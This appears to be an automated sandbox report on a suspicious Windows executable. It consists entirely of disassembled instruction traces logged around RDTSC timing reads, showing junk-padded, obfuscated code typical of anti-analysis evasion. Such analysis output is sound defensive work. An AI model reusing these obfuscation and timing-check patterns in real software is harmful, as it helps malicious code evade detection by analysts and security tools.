Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F075A second address: 71F075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F075E second address: 71F0764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0764 second address: 71F077E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CF6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F077E second address: 71F07B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+28h], eax 0x0000000e jmp 00007F78B909B106h 0x00000013 mov eax, dword ptr [ebx+68h] 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edi, 201C4290h 0x0000001e mov dh, F7h 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F07B6 second address: 71F07C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CEEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F07C8 second address: 71F07CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F07CC second address: 71F08CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+2Ch], eax 0x0000000b jmp 00007F78B9095CF7h 0x00000010 mov ax, word ptr [ebx+6Ch] 0x00000014 pushad 0x00000015 movzx ecx, dx 0x00000018 mov dx, 38E4h 0x0000001c popad 0x0000001d mov word ptr [esi+30h], ax 0x00000021 pushad 0x00000022 call 00007F78B9095CF9h 0x00000027 pushfd 0x00000028 jmp 00007F78B9095CF0h 0x0000002d jmp 00007F78B9095CF5h 0x00000032 popfd 0x00000033 pop esi 0x00000034 movsx edx, ax 0x00000037 popad 0x00000038 mov ax, word ptr [ebx+00000088h] 0x0000003f pushad 0x00000040 pushfd 0x00000041 jmp 00007F78B9095CF6h 0x00000046 jmp 00007F78B9095CF5h 0x0000004b popfd 0x0000004c mov di, si 0x0000004f popad 0x00000050 mov word ptr [esi+32h], ax 0x00000054 pushad 0x00000055 mov edx, esi 0x00000057 jmp 00007F78B9095CF4h 0x0000005c popad 0x0000005d mov eax, dword ptr [ebx+0000008Ch] 0x00000063 jmp 00007F78B9095CF0h 0x00000068 mov dword ptr [esi+34h], eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F78B9095CF7h 0x00000072 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08CC second address: 71F08D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08D2 second address: 71F08D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08D6 second address: 71F08DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F08DA second address: 71F0939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+18h] 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F78B9095CEDh 0x00000012 xor cl, 00000066h 0x00000015 jmp 00007F78B9095CF1h 0x0000001a popfd 0x0000001b mov edi, eax 0x0000001d popad 0x0000001e mov dword ptr [esi+38h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F78B9095CEFh 0x0000002a jmp 00007F78B9095CF3h 0x0000002f popfd 0x00000030 mov edx, esi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0939 second address: 71F0964 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B105h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+1Ch] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0964 second address: 71F09F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B9095CF7h 0x00000009 or ch, 0000000Eh 0x0000000c jmp 00007F78B9095CF9h 0x00000011 popfd 0x00000012 pushfd 0x00000013 jmp 00007F78B9095CF0h 0x00000018 sub cl, FFFFFF88h 0x0000001b jmp 00007F78B9095CEBh 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 mov dword ptr [esi+3Ch], eax 0x00000027 jmp 00007F78B9095CF6h 0x0000002c mov eax, dword ptr [ebx+20h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F78B9095CF7h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F09F4 second address: 71F0A23 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B109h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+40h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F78B909B0FDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0A23 second address: 71F0A46 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 1F6CB2F9h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+00000080h] 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edi, ax 0x00000017 call 00007F78B9095CEAh 0x0000001c pop esi 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0A46 second address: 71F0A90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F78B909B0FEh 0x00000009 jmp 00007F78B909B105h 0x0000000e popfd 0x0000000f mov ebx, ecx 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F78B909B109h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0A90 second address: 71F0AC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b push eax 0x0000000c jmp 00007F78B9095CF3h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 mov dx, 11CAh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0AC2 second address: 71F0ADF instructions: 0x00000000 rdtsc 0x00000002 movsx edx, cx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push eax 0x00000009 jmp 00007F78B909B0FDh 0x0000000e nop 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ADF second address: 71F0AE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0AE3 second address: 71F0AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0AE9 second address: 71F0B1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebp-10h] 0x0000000c jmp 00007F78B9095CF0h 0x00000011 nop 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 mov bl, C5h 0x00000017 mov ax, 1365h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0B1D second address: 71F0B5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov esi, edi 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushfd 0x00000014 jmp 00007F78B909B0FDh 0x00000019 or eax, 55DE9766h 0x0000001f jmp 00007F78B909B101h 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0B5C second address: 71F0B82 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 7A429B97h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CF9h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0B82 second address: 71F0B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0BEC second address: 71F0BF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0BF2 second address: 71F0C0A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C0A second address: 71F0C27 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C27 second address: 71F0C2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C2D second address: 71F0C73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b js 00007F7929064763h 0x00000011 jmp 00007F78B9095CF6h 0x00000016 mov eax, dword ptr [ebp-0Ch] 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F78B9095CEAh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C73 second address: 71F0C77 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C77 second address: 71F0C7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0C7D second address: 71F0CBE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c jmp 00007F78B909B100h 0x00000011 lea eax, dword ptr [ebx+78h] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F78B909B107h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0CBE second address: 71F0CD6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B9095CF4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0CD6 second address: 71F0CE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d movsx edx, ax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0CE6 second address: 71F0D00 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, 5BB52657h 0x0000000b popad 0x0000000c nop 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov dx, 40BAh 0x00000014 mov ebx, 6B67AE86h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D00 second address: 71F0D06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D06 second address: 71F0D0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D0A second address: 71F0D0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D0E second address: 71F0D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CF7h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D32 second address: 71F0D36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0D36 second address: 71F0D3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0E8A second address: 71F0ECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 test edi, edi 0x00000008 jmp 00007F78B909B106h 0x0000000d js 00007F7929069907h 0x00000013 jmp 00007F78B909B100h 0x00000018 mov eax, dword ptr [ebp-04h] 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F78B909B0FAh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ECF second address: 71F0ED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ED3 second address: 71F0ED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0ED9 second address: 71F0F0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+08h], eax 0x0000000b jmp 00007F78B9095CF5h 0x00000010 lea eax, dword ptr [ebx+70h] 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F78B9095CEDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F0B second address: 71F0F1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F78B909B0FCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F1B second address: 71F0F1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F1F second address: 71F0F42 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push 00000001h 0x0000000a pushad 0x0000000b movsx edi, ax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop edi 0x00000012 popad 0x00000013 nop 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F78B909B0FDh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F42 second address: 71F0F64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, dx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F78B9095CEFh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov eax, edi 0x00000015 push edx 0x00000016 pop ecx 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F64 second address: 71F0F87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 mov di, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-18h] 0x0000000e pushad 0x0000000f mov edx, eax 0x00000011 mov di, cx 0x00000014 popad 0x00000015 nop 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov edx, 0DE92E10h 0x0000001e mov dx, 1B3Ch 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0F87 second address: 71F0FB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F78B9095CEBh 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov ah, dh 0x00000015 mov ecx, 696EE2A3h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0FB5 second address: 71F0FBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0FBB second address: 71F0FBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F0FBF second address: 71F0FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F103A second address: 71F10E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F78B9095CF7h 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F78B9095CF9h 0x0000000f add ah, 00000026h 0x00000012 jmp 00007F78B9095CF1h 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov eax, dword ptr [ebp-14h] 0x0000001e jmp 00007F78B9095CEEh 0x00000023 mov ecx, esi 0x00000025 jmp 00007F78B9095CF0h 0x0000002a mov dword ptr [esi+0Ch], eax 0x0000002d jmp 00007F78B9095CF0h 0x00000032 mov edx, 772406ECh 0x00000037 jmp 00007F78B9095CF0h 0x0000003c sub eax, eax 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007F78B9095CEDh 0x00000046 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F10E4 second address: 71F11D4 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 1CA22C07h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, 3B2B81A3h 0x0000000e popad 0x0000000f lock cmpxchg dword ptr [edx], ecx 0x00000013 jmp 00007F78B909B106h 0x00000018 pop edi 0x00000019 jmp 00007F78B909B100h 0x0000001e test eax, eax 0x00000020 jmp 00007F78B909B100h 0x00000025 jne 00007F79290696A2h 0x0000002b pushad 0x0000002c mov bx, ax 0x0000002f pushfd 0x00000030 jmp 00007F78B909B0FAh 0x00000035 sbb esi, 67BEF478h 0x0000003b jmp 00007F78B909B0FBh 0x00000040 popfd 0x00000041 popad 0x00000042 mov edx, dword ptr [ebp+08h] 0x00000045 jmp 00007F78B909B106h 0x0000004a mov eax, dword ptr [esi] 0x0000004c pushad 0x0000004d push esi 0x0000004e pushfd 0x0000004f jmp 00007F78B909B0FDh 0x00000054 adc ax, F7C6h 0x00000059 jmp 00007F78B909B101h 0x0000005e popfd 0x0000005f pop ecx 0x00000060 mov si, dx 0x00000063 popad 0x00000064 mov dword ptr [edx], eax 0x00000066 pushad 0x00000067 push eax 0x00000068 push edx 0x00000069 pushfd 0x0000006a jmp 00007F78B909B0FFh 0x0000006f add esi, 2962DEFEh 0x00000075 jmp 00007F78B909B109h 0x0000007a popfd 0x0000007b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F11D4 second address: 71F11F3 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B9095CF2h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F11F3 second address: 71F1222 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B909B0FBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ecx, ebx 0x00000011 jmp 00007F78B909B107h 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1222 second address: 71F128B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+08h] 0x0000000c pushad 0x0000000d movzx eax, di 0x00000010 mov cx, bx 0x00000013 popad 0x00000014 mov dword ptr [edx+08h], eax 0x00000017 pushad 0x00000018 movsx edi, si 0x0000001b mov si, 8FA9h 0x0000001f popad 0x00000020 mov eax, dword ptr [esi+0Ch] 0x00000023 jmp 00007F78B9095CF4h 0x00000028 mov dword ptr [edx+0Ch], eax 0x0000002b pushad 0x0000002c mov edx, ecx 0x0000002e popad 0x0000002f mov eax, dword ptr [esi+10h] 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F78B9095CF2h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F128B second address: 71F1291 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1291 second address: 71F1323 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CEDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+10h], eax 0x0000000e pushad 0x0000000f mov bl, cl 0x00000011 mov edi, 630AA74Ch 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+14h] 0x0000001a pushad 0x0000001b mov dx, 93E4h 0x0000001f mov ah, dh 0x00000021 popad 0x00000022 mov dword ptr [edx+14h], eax 0x00000025 jmp 00007F78B9095CF4h 0x0000002a mov eax, dword ptr [esi+18h] 0x0000002d pushad 0x0000002e pushfd 0x0000002f jmp 00007F78B9095CEEh 0x00000034 add esi, 54CD25C8h 0x0000003a jmp 00007F78B9095CEBh 0x0000003f popfd 0x00000040 movzx esi, dx 0x00000043 popad 0x00000044 mov dword ptr [edx+18h], eax 0x00000047 jmp 00007F78B9095CEBh 0x0000004c mov eax, dword ptr [esi+1Ch] 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F78B9095CF5h 0x00000056 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1323 second address: 71F13EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, ax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+1Ch], eax 0x0000000e jmp 00007F78B909B104h 0x00000013 mov eax, dword ptr [esi+20h] 0x00000016 jmp 00007F78B909B100h 0x0000001b mov dword ptr [edx+20h], eax 0x0000001e pushad 0x0000001f call 00007F78B909B0FEh 0x00000024 pushfd 0x00000025 jmp 00007F78B909B102h 0x0000002a sbb si, 4F48h 0x0000002f jmp 00007F78B909B0FBh 0x00000034 popfd 0x00000035 pop eax 0x00000036 mov dx, 718Ch 0x0000003a popad 0x0000003b mov eax, dword ptr [esi+24h] 0x0000003e jmp 00007F78B909B0FBh 0x00000043 mov dword ptr [edx+24h], eax 0x00000046 jmp 00007F78B909B106h 0x0000004b mov eax, dword ptr [esi+28h] 0x0000004e jmp 00007F78B909B100h 0x00000053 mov dword ptr [edx+28h], eax 0x00000056 push eax 0x00000057 push edx 0x00000058 jmp 00007F78B909B107h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F13EA second address: 71F1448 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F78B9095CF9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007F78B9095CEEh 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 jmp 00007F78B9095CF0h 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d jmp 00007F78B9095CF0h 0x00000022 mov word ptr [edx+30h], ax 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 push esi 0x0000002a pop edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1448 second address: 71F1462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ax, word ptr [esi+32h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F78B909B0FDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\jklg6EIhyR.exeRDTSC instruction interceptor: First address: 71F1462 second address: 71F1468 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
